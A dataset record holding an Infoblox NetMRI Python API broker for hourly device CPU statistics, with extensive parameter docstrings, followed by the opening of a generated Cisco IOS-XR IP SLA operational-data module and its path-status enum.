| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
46894717b61c99b63e2be204c229bda35ee8a8be
| 42,534
|
py
|
Python
|
infoblox_netmri/api/broker/v3_6_0/device_cpu_hourly_broker.py
|
IngmarVG-IB/infoblox-netmri
|
b0c725fd64aee1890d83917d911b89236207e564
|
[
"Apache-2.0"
] | null | null | null |
infoblox_netmri/api/broker/v3_6_0/device_cpu_hourly_broker.py
|
IngmarVG-IB/infoblox-netmri
|
b0c725fd64aee1890d83917d911b89236207e564
|
[
"Apache-2.0"
] | null | null | null |
infoblox_netmri/api/broker/v3_6_0/device_cpu_hourly_broker.py
|
IngmarVG-IB/infoblox-netmri
|
b0c725fd64aee1890d83917d911b89236207e564
|
[
"Apache-2.0"
] | null | null | null |
from ..broker import Broker
class DeviceCpuHourlyBroker(Broker):
controller = "device_cpu_hourlies"
def index(self, **kwargs):
"""Lists the available device cpu hourlies. Any of the inputs listed may be be used to narrow the list; other inputs will be ignored. Of the various ways to query lists, using this method is most efficient.
**Inputs**
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceCpuHourlyID: The internal NetMRI identifier for this Device CPU Hourly record.
:type DeviceCpuHourlyID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceCpuHourlyID: The internal NetMRI identifier for this Device CPU Hourly record.
:type DeviceCpuHourlyID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device from which this record was collected.
:type DeviceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device from which this record was collected.
:type DeviceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StartTime: The starting date/time for the hourly interval.
:type StartTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StartTime: The starting date/time for the hourly interval.
:type StartTime: Array of DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` today
:param starttime: The data returned will represent the device cpu hourlies with this date and time as lower boundary. If omitted, the result will indicate the most recently collected data.
:type starttime: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` tomorrow
:param endtime: The data returned will represent the device cpu hourlies with this date and time as upper boundary. If omitted, the result will indicate the most recently collected data.
:type endtime: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of device cpu hourly methods. The listed methods will be called on each device cpu hourly returned and included in the output. Available methods are: data_source, device, infradevice.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: data_source, device.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` DeviceCpuHourlyID
:param sort: The data field(s) to use for sorting the output. Default is DeviceCpuHourlyID. Valid values are DeviceCpuHourlyID, DataSourceID, DeviceID, StartTime, CpuIndex, CpuBusyMin, CpuBusyAvg, CpuBusyMax.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each DeviceCpuHourly. Valid values are DeviceCpuHourlyID, DataSourceID, DeviceID, StartTime, CpuIndex, CpuBusyMin, CpuBusyAvg, CpuBusyMax. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return device_cpu_hourlies: An array of the DeviceCpuHourly objects that match the specified input criteria.
:rtype device_cpu_hourlies: Array of DeviceCpuHourly
"""
return self.api_list_request(self._get_method_fullname("index"), kwargs)
def show(self, **kwargs):
"""Shows the details for the specified device cpu hourly.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceCpuHourlyID: The internal NetMRI identifier for this Device CPU Hourly record.
:type DeviceCpuHourlyID: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of device cpu hourly methods. The listed methods will be called on each device cpu hourly returned and included in the output. Available methods are: data_source, device, infradevice.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: data_source, device.
:type include: Array of String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return device_cpu_hourly: The device cpu hourly identified by the specified DeviceCpuHourlyID.
:rtype device_cpu_hourly: DeviceCpuHourly
"""
return self.api_request(self._get_method_fullname("show"), kwargs)
def search(self, **kwargs):
"""Lists the available device cpu hourlies matching the input criteria. This method provides a more flexible search interface than the index method, but searching using this method is more demanding on the system and will not perform to the same level as the index method. The input fields listed below will be used as in the index method, to filter the result, along with the optional query string and XML filter described below.
**Inputs**
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param CpuBusyAvg: The mean CPU busy reading during the hour.
:type CpuBusyAvg: Float
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param CpuBusyAvg: The mean CPU busy reading during the hour.
:type CpuBusyAvg: Array of Float
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param CpuBusyMax: The maximum CPU busy reading during the hour.
:type CpuBusyMax: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param CpuBusyMax: The maximum CPU busy reading during the hour.
:type CpuBusyMax: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param CpuBusyMin: The minimum CPU busy reading during the hour.
:type CpuBusyMin: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param CpuBusyMin: The minimum CPU busy reading during the hour.
:type CpuBusyMin: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param CpuIndex: The CPU number.
:type CpuIndex: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param CpuIndex: The CPU number.
:type CpuIndex: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record.
:type DataSourceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record.
:type DataSourceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceCpuHourlyID: The internal NetMRI identifier for this Device CPU Hourly record.
:type DeviceCpuHourlyID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceCpuHourlyID: The internal NetMRI identifier for this Device CPU Hourly record.
:type DeviceCpuHourlyID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device from which this record was collected.
:type DeviceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device from which this record was collected.
:type DeviceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StartTime: The starting date/time for the hourly interval.
:type StartTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StartTime: The starting date/time for the hourly interval.
:type StartTime: Array of DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` today
:param starttime: The data returned will represent the device cpu hourlies with this date and time as lower boundary. If omitted, the result will indicate the most recently collected data.
:type starttime: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` tomorrow
:param endtime: The data returned will represent the device cpu hourlies with this date and time as upper boundary. If omitted, the result will indicate the most recently collected data.
:type endtime: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of device cpu hourly methods. The listed methods will be called on each device cpu hourly returned and included in the output. Available methods are: data_source, device, infradevice.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: data_source, device.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` DeviceCpuHourlyID
:param sort: The data field(s) to use for sorting the output. Default is DeviceCpuHourlyID. Valid values are DeviceCpuHourlyID, DataSourceID, DeviceID, StartTime, CpuIndex, CpuBusyMin, CpuBusyAvg, CpuBusyMax.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each DeviceCpuHourly. Valid values are DeviceCpuHourlyID, DataSourceID, DeviceID, StartTime, CpuIndex, CpuBusyMin, CpuBusyAvg, CpuBusyMax. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param query: This value will be matched against device cpu hourlies, looking to see if one or more of the listed attributes contain the passed value. You may also surround the value with '/' and '/' to perform a regular expression search rather than a containment operation. Any record that matches will be returned. The attributes searched are: CpuBusyAvg, CpuBusyMax, CpuBusyMin, CpuIndex, DataSourceID, DeviceCpuHourlyID, DeviceID, StartTime.
:type query: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return device_cpu_hourlies: An array of the DeviceCpuHourly objects that match the specified input criteria.
:rtype device_cpu_hourlies: Array of DeviceCpuHourly
"""
return self.api_list_request(self._get_method_fullname("search"), kwargs)
def find(self, **kwargs):
"""Lists the available device cpu hourlies matching the input specification. This provides the most flexible search specification of all the query mechanisms, enabling searching using comparison operations other than equality. However, it is more complex to use and will not perform as efficiently as the index or search methods. In the input descriptions below, 'field names' refers to the following fields: CpuBusyAvg, CpuBusyMax, CpuBusyMin, CpuIndex, DataSourceID, DeviceCpuHourlyID, DeviceID, StartTime.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_CpuBusyAvg: The operator to apply to the field CpuBusyAvg. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. CpuBusyAvg: The mean CPU busy reading during the hour. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_CpuBusyAvg: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_CpuBusyAvg: If op_CpuBusyAvg is specified, the field named in this input will be compared to the value in CpuBusyAvg using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_CpuBusyAvg must be specified if op_CpuBusyAvg is specified.
:type val_f_CpuBusyAvg: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_CpuBusyAvg: If op_CpuBusyAvg is specified, this value will be compared to the value in CpuBusyAvg using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_CpuBusyAvg must be specified if op_CpuBusyAvg is specified.
:type val_c_CpuBusyAvg: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_CpuBusyMax: The operator to apply to the field CpuBusyMax. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. CpuBusyMax: The maximum CPU busy reading during the hour. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_CpuBusyMax: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_CpuBusyMax: If op_CpuBusyMax is specified, the field named in this input will be compared to the value in CpuBusyMax using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_CpuBusyMax must be specified if op_CpuBusyMax is specified.
:type val_f_CpuBusyMax: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_CpuBusyMax: If op_CpuBusyMax is specified, this value will be compared to the value in CpuBusyMax using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_CpuBusyMax must be specified if op_CpuBusyMax is specified.
:type val_c_CpuBusyMax: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_CpuBusyMin: The operator to apply to the field CpuBusyMin. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. CpuBusyMin: The minimum CPU busy reading during the hour. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_CpuBusyMin: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_CpuBusyMin: If op_CpuBusyMin is specified, the field named in this input will be compared to the value in CpuBusyMin using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_CpuBusyMin must be specified if op_CpuBusyMin is specified.
:type val_f_CpuBusyMin: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_CpuBusyMin: If op_CpuBusyMin is specified, this value will be compared to the value in CpuBusyMin using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_CpuBusyMin must be specified if op_CpuBusyMin is specified.
:type val_c_CpuBusyMin: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_CpuIndex: The operator to apply to the field CpuIndex. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. CpuIndex: The CPU number. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_CpuIndex: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_CpuIndex: If op_CpuIndex is specified, the field named in this input will be compared to the value in CpuIndex using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_CpuIndex must be specified if op_CpuIndex is specified.
:type val_f_CpuIndex: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_CpuIndex: If op_CpuIndex is specified, this value will be compared to the value in CpuIndex using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_CpuIndex must be specified if op_CpuIndex is specified.
:type val_c_CpuIndex: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DataSourceID: The operator to apply to the field DataSourceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DataSourceID: If op_DataSourceID is specified, the field named in this input will be compared to the value in DataSourceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DataSourceID must be specified if op_DataSourceID is specified.
:type val_f_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DataSourceID: If op_DataSourceID is specified, this value will be compared to the value in DataSourceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DataSourceID must be specified if op_DataSourceID is specified.
:type val_c_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceCpuHourlyID: The operator to apply to the field DeviceCpuHourlyID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceCpuHourlyID: The internal NetMRI identifier for this Device CPU Hourly record. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceCpuHourlyID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceCpuHourlyID: If op_DeviceCpuHourlyID is specified, the field named in this input will be compared to the value in DeviceCpuHourlyID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceCpuHourlyID must be specified if op_DeviceCpuHourlyID is specified.
:type val_f_DeviceCpuHourlyID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceCpuHourlyID: If op_DeviceCpuHourlyID is specified, this value will be compared to the value in DeviceCpuHourlyID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceCpuHourlyID must be specified if op_DeviceCpuHourlyID is specified.
:type val_c_DeviceCpuHourlyID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceID: The operator to apply to the field DeviceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceID: The internal NetMRI identifier for the device from which this record was collected. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceID: If op_DeviceID is specified, the field named in this input will be compared to the value in DeviceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceID must be specified if op_DeviceID is specified.
:type val_f_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceID: If op_DeviceID is specified, this value will be compared to the value in DeviceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceID must be specified if op_DeviceID is specified.
:type val_c_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StartTime: The operator to apply to the field StartTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StartTime: The starting date/time for the hourly interval. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StartTime: If op_StartTime is specified, the field named in this input will be compared to the value in StartTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StartTime must be specified if op_StartTime is specified.
:type val_f_StartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StartTime: If op_StartTime is specified, this value will be compared to the value in StartTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StartTime must be specified if op_StartTime is specified.
:type val_c_StartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` today
:param starttime: The data returned will represent the device cpu hourlies with this date and time as lower boundary. If omitted, the result will indicate the most recently collected data.
:type starttime: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` tomorrow
:param endtime: The data returned will represent the device cpu hourlies with this date and time as upper boundary. If omitted, the result will indicate the most recently collected data.
:type endtime: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of device cpu hourly methods. The listed methods will be called on each device cpu hourly returned and included in the output. Available methods are: data_source, device, infradevice.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: data_source, device.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` DeviceCpuHourlyID
:param sort: The data field(s) to use for sorting the output. Default is DeviceCpuHourlyID. Valid values are DeviceCpuHourlyID, DataSourceID, DeviceID, StartTime, CpuIndex, CpuBusyMin, CpuBusyAvg, CpuBusyMax.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each DeviceCpuHourly. Valid values are DeviceCpuHourlyID, DataSourceID, DeviceID, StartTime, CpuIndex, CpuBusyMin, CpuBusyAvg, CpuBusyMax. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return device_cpu_hourlies: An array of the DeviceCpuHourly objects that match the specified input criteria.
:rtype device_cpu_hourlies: Array of DeviceCpuHourly
"""
return self.api_list_request(self._get_method_fullname("find"), kwargs)
def data_source(self, **kwargs):
    """Fetch the collector NetMRI (DataSource) that collected this record.

    **Inputs**

    |  ``api version min:`` None
    |  ``api version max:`` None
    |  ``required:`` True
    |  ``default:`` None

    :param DeviceCpuHourlyID: The internal NetMRI identifier for this Device CPU Hourly record.
    :type DeviceCpuHourlyID: Integer

    **Outputs**

    :return: The collector NetMRI that collected this data record.
    :rtype: DataSource
    """
    # Resolve the broker-qualified method name, then issue the API call.
    full_method_name = self._get_method_fullname("data_source")
    return self.api_request(full_method_name, kwargs)
def infradevice(self, **kwargs):
    """Fetch the device (as an InfraDevice) from which this data was collected.

    **Inputs**

    |  ``api version min:`` None
    |  ``api version max:`` None
    |  ``required:`` True
    |  ``default:`` None

    :param DeviceCpuHourlyID: The internal NetMRI identifier for this Device CPU Hourly record.
    :type DeviceCpuHourlyID: Integer

    **Outputs**

    :return: The device from which this data was collected.
    :rtype: InfraDevice
    """
    # Resolve the broker-qualified method name, then issue the API call.
    full_method_name = self._get_method_fullname("infradevice")
    return self.api_request(full_method_name, kwargs)
def device(self, **kwargs):
    """Fetch the device (as a Device) from which this data was collected.

    **Inputs**

    |  ``api version min:`` None
    |  ``api version max:`` None
    |  ``required:`` True
    |  ``default:`` None

    :param DeviceCpuHourlyID: The internal NetMRI identifier for this Device CPU Hourly record.
    :type DeviceCpuHourlyID: Integer

    **Outputs**

    :return: The device from which this data was collected.
    :rtype: Device
    """
    # Resolve the broker-qualified method name, then issue the API call.
    full_method_name = self._get_method_fullname("device")
    return self.api_request(full_method_name, kwargs)
| 47.952649
| 516
| 0.592091
| 5,082
| 42,534
| 4.911846
| 0.05608
| 0.078519
| 0.051038
| 0.05925
| 0.935061
| 0.93402
| 0.917995
| 0.909022
| 0.890474
| 0.886267
| 0
| 0.005033
| 0.322683
| 42,534
| 887
| 517
| 47.952649
| 0.861432
| 0.799008
| 0
| 0
| 0
| 0
| 0.055369
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.411765
| false
| 0
| 0.058824
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
46937815ee612ffd8864f5e11e9191ed03474849
| 875,834
|
py
|
Python
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_man_ipsla_oper.py
|
bopopescu/ACI
|
dd717bc74739eeed4747b3ea9e36b239580df5e1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_man_ipsla_oper.py
|
bopopescu/ACI
|
dd717bc74739eeed4747b3ea9e36b239580df5e1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_man_ipsla_oper.py
|
bopopescu/ACI
|
dd717bc74739eeed4747b3ea9e36b239580df5e1
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2020-07-22T04:04:44.000Z
|
2020-07-22T04:04:44.000Z
|
""" Cisco_IOS_XR_man_ipsla_oper
This module contains a collection of YANG definitions
for Cisco IOS\-XR man\-ipsla package operational data.
This module contains definitions
for the following management objects\:
ipsla\: IPSLA operational data
Copyright (c) 2013\-2017 by Cisco Systems, Inc.
All rights reserved.
"""
from collections import OrderedDict
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class IpslaLspGrpPathStatusEnum(Enum):
    """IpslaLspGrpPathStatusEnum (Enum Class).

    Ipsla lsp grp path status enum. Each member maps a numeric value to
    its YANG enum identifier: unknown=0, up=1, down=2, retry=3, pending=4.
    """

    # Each member wraps (numeric value, YANG enum literal) in a ydk YLeaf.
    ipsla_lsp_grp_path_status_unknown = Enum.YLeaf(0, "ipsla-lsp-grp-path-status-unknown")

    ipsla_lsp_grp_path_status_up = Enum.YLeaf(1, "ipsla-lsp-grp-path-status-up")

    ipsla_lsp_grp_path_status_down = Enum.YLeaf(2, "ipsla-lsp-grp-path-status-down")

    ipsla_lsp_grp_path_status_retry = Enum.YLeaf(3, "ipsla-lsp-grp-path-status-retry")

    ipsla_lsp_grp_path_status_pending = Enum.YLeaf(4, "ipsla-lsp-grp-path-status-pending")
